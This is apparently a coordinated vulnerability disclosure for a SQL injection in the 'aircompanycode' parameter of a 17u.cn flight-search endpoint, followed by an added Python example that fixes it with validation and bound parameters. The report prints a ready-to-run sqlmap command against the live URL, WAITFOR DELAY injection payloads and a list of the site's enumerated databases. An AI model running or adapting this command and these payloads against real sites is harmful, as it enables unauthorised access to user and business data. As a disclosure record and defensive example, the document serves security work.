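2013-12-20: Details reported to the vendor; awaiting vendor action
2013-12-23: Vendor confirmed; details disclosed to the vendor only
2014-01-02: Details disclosed to core white hats and relevant domain experts
2014-01-12: Details disclosed to regular white hats
2014-01-22: Details disclosed to intern white hats
2014-02-03: Details disclosed to the public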
0.0
Injection point: www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3
The GET parameter aircompanycode is injectable. This is a notification that the injection point exists; no further testing was done!
python sqlmap.py -u "www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3" --user-agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" --batch --dbs

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: aircompanycode
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: aircompanycode='; WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: aircompanycode=' WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3

available databases [28]:
[*] 17u_net
[*] 17uEbookingHistory
[*] IpData
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCCar
[*] TCCline
[*] TCCLineResource
[*] TCEbook
[*] TCFly
[*] TCFlyUtility
[*] TCHotel
[*] TCHotelFinance
[*] TCHotelOrder
[*] TCHotelRedundant
[*] TCHotelResource
[*] TCMapBarData
[*] TCMapBarDataClass
[*] TCScenery
[*] TcSceneryParameter
[*] TcSceneryResource
[*] TCShare
[*] TCUserInfo
[*] TCWEB
[*] tempdb
Filtering
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2013-12-23 08:07
Being processed; thanks @秋风
None yet
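
Added example, not part of the original report or the vendor's code: one way to harden the aircompanycode lookup with allowlist validation plus a bound parameter. sqlite3 stands in for SQL Server, the flights table and its columns are hypothetical, and the 2-3 character airline-code format is an assumption.

```python
import re
import sqlite3

# Assumption: airline codes are 2-3 ASCII letters/digits (IATA/ICAO style).
AIRLINE_CODE = re.compile(r"[A-Za-z0-9]{2,3}")

# Payload copied from the sqlmap output in the report.
REPORTED_PAYLOAD = "'; WAITFOR DELAY '0:0:5'--"


def unsafe_sql(aircompanycode):
    """String concatenation: the pattern that makes the parameter injectable."""
    return "SELECT flight_no FROM flights WHERE airline = '" + aircompanycode + "'"


def valid_airline_code(value):
    """Allowlist check; the empty string means 'no airline filter'."""
    return value == "" or AIRLINE_CODE.fullmatch(value) is not None


def find_flights(conn, aircompanycode):
    """Validate first, then bind the value so it can never become SQL text."""
    if not valid_airline_code(aircompanycode):
        raise ValueError("invalid aircompanycode")
    if aircompanycode == "":
        rows = conn.execute("SELECT flight_no FROM flights ORDER BY flight_no")
    else:
        rows = conn.execute(
            "SELECT flight_no FROM flights WHERE airline = ? ORDER BY flight_no",
            (aircompanycode,),
        )
    return [r[0] for r in rows]


def demo_db():
    """Constructed sample data in an in-memory database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flights (flight_no TEXT, airline TEXT)")
    conn.executemany(
        "INSERT INTO flights VALUES (?, ?)",
        [("CA1501", "CA"), ("MU5101", "MU"), ("CA1831", "CA")],
    )
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(unsafe_sql(REPORTED_PAYLOAD))  # the quote closes early; WAITFOR becomes SQL
    print(find_flights(db, "CA"))        # bound value is only ever compared as data
```

Binding is the actual fix; the allowlist is defence in depth and gives the handler an early, loggable rejection point.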